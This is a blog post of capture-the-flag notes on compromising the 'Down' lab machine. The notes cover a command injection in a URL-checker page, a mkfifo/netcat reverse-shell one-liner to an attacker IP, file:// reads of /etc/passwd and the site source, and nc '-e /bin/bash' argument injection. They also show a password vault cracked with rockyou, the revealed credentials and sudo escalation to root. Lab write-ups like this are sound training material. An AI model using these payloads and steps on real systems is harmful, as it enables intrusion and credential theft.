chidunguyen.com

DOWN-HTB Notes

DOWN-HTB

Written by

Du

in

Here is my notes on DOWN box from Vulnlab which deployed to Hackthebox from yesterday. 

DOWN: 10.10.95.4

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f6cc217ccadaed34fd04efe6f94cddf8 (ECDSA)
|_  256 fa061ff4bf8ce3b0c840210d5706dd11 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)


No Interesting Nikto - NOPE ! 


/index.php: 

Is that website down, or is it just you?

Please enter a URL. - Input Field. 

Looks like it respond to Kali really well. 

http://10.8.0.71/ || whoami && wget http://10.8.0.71/


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 1234 >/tmp/f

OS Command Injections Example: #DOWN-VL

sudo nc -lnvp 80
listening on [any] 80 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 51664
GET / HTTP/1.1
Host: 10.8.0.71
User-Agent: curl/7.81.0
Accept: */*

So the target use curl to grab the data from the URL.

url=http://localhost/+%26%26+file%3a///etc/passwd

http://localhost/ && file:///etc/passwd

url=http://localhost/+file:///etc/passwd

http://localhost file:///etc/passwd

url=http://localhost/+file:///var/www/html/index.php

index.php:

<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
  echo '<h1>Is the port refused, or is it just you?</h1>
        <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
            <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
            <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
            <button type="submit">Is it refused?</button>
        </form>';
} else {
  echo '<h1>Is that website down, or is it just you?</h1>
        <form id="urlForm" action="index.php" method="POST">
            <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
            <button type="submit">Is it down?</button>
        </form>';
}

if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
  $ip = trim($_POST['ip']);
  $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
  $port = trim($_POST['port']);
  $port_int = intval($port);
  $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
  if ( $valid_ip && $valid_port ) {
    $rc = 255; $output = '';
    $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
    exec($ec . " 2>&1",$output,$rc);
    echo '<div class="output" id="outputSection">';
    if ( $rc === 0 ) {
      echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
      echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
    } else {
      echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
      echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
    }


[SNIP]

BurpSuite:

POST /index.php?expertmode=tcp 

ip=10.8.0.71&port=1234 #WORKS ! 

ip=10.8.0.71&port=1234+-e+/bin/bash


https://xr34p.com/posts/Vulnlab-Down-Writeup/




┌──(root㉿kali)-[/home/kali/Kali-Tools/p0wny-shell/shell.php]
└─# sudo nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 44298

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
down
python3 -c 'import pty; pty.spawn("/bin/bash")'


python3 -c 'import pty; pty.spawn("/bin/bash")'


USER-SHELL !

www-data@down:/var/www/html$ ls
ls
index.php  logo.png  style.css  user_aeT1xa.txt
www-data@down:/var/www/html$ cat user_aeT1xa.txt
cat user_aeT1xa.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}

PRIV ESC:

www-data -> aleks:

GCC enabled. 

no interesting /opt directory.

no SUID binary. 

no sudo -l. 

no interesting getcap binaries either. 

LINPEAS: 

[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh #NOPE
/usr/bin/rescan-scsi-bus.sh   #NOPE

[+] Files inside others home (limit 20)
/home/aleks/.bashrc
/home/aleks/.sudo_as_admin_successful
/home/aleks/.local/share/pswm/pswm #Interesting ?
/home/aleks/.profile
/home/aleks/.bash_logout

www-data@down:/home/aleks/.local/share/pswm$ ls -lah
ls -lah
total 12K
drwxrwxr-x 2 aleks aleks 4.0K Sep 13 15:36 .
drwxrwxr-x 3 aleks aleks 4.0K Sep 13 15:36 ..
-rw-rw-r-- 1 aleks aleks  151 Sep 13 15:36 pswm
www-data@down:/home/aleks/.local/share/pswm$ cat pswm
cat pswm
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==
ls
pswm
www-data@down:/home/aleks/.local/share/pswm$ cat pswm
cat pswm
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==




No Crontab either !. 

Neither cron.d. 


PSWM Cracking: 

https://xr34p.com/posts/Vulnlab-Down-Writeup/

https://github.com/seriotonctf/pswm-decryptor

┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# sudo pip3 install cryptocode prettytable
Collecting cryptocode
  Downloading cryptocode-0.1-py3-none-any.whl.metadata (2.9 kB)
Requirement already satisfied: prettytable in /usr/lib/python3/dist-packages (3.6.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from cryptocode) (3.11.0)
Requirement already satisfied: wcwidth in /usr/lib/python3/dist-packages (from prettytable) (0.2.13)
Downloading cryptocode-0.1-py3-none-any.whl (4.1 kB)
Installing collected packages: cryptocode
Successfully installed cryptocode-0.1
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv

┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# sudo leafpad pswm

┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# cat pswm
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==

┌──(root㉿kali)-[/home/kali/Kali-Tools/pswm-decryptor]
└─# python3 pswm-decrypt.py -f pswm -w /usr/share/wordlists/rockyou.txt
[+] Master Password: flower
[+] Decrypted Data:
+------------+----------+----------------------+
| Alias      | Username | Password             |
+------------+----------+----------------------+
| pswm       | aleks    | flower               |
| aleks@down | aleks    | 1uY3w22uc-Wr{xNHR~+E |
+------------+----------+----------------------+

aleks:1uY3w22uc-Wr{xNHR~+E - aleks SHELL !


┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.95.4] 57756
python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@down:/var/www/html$
www-data@down:/var/www/html$ su - aleks
su - aleks
Password: flower

su: Authentication failure
www-data@down:/var/www/html$ su - aleks
su - aleks
Password: 1uY3w22uc-Wr{xNHR~+E

aleks@down:~$ whoami
whoami
aleks

aleks -> ROOT: 

aleks@down:~$ sudo -l
sudo -l
[sudo] password for aleks: 1uY3w22uc-Wr{xNHR~+E

Matching Defaults entries for aleks on down:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User aleks may run the following commands on down:
    (ALL : ALL) ALL
aleks@down:~$ sudo su
sudo su
root@down:/home/aleks# whoami
whoami
root
root@down:/home/aleks# id
id
uid=0(root) gid=0(root) groups=0(root)
root@down:/home/aleks# hostname
hostname
down


ROOT-SHELL ! 

root@down:~# whoami
whoami
root
root@down:~# hostname
hostname
down
root@down:~# ls
ls
root.txt  snap
root@down:~# cat root.txt
cat root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}









/javascript - Forbidden - NOPE !

/server-status - Forbidden - NOPE !


Source Page of index.php = Nothing Interesting. 

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

More posts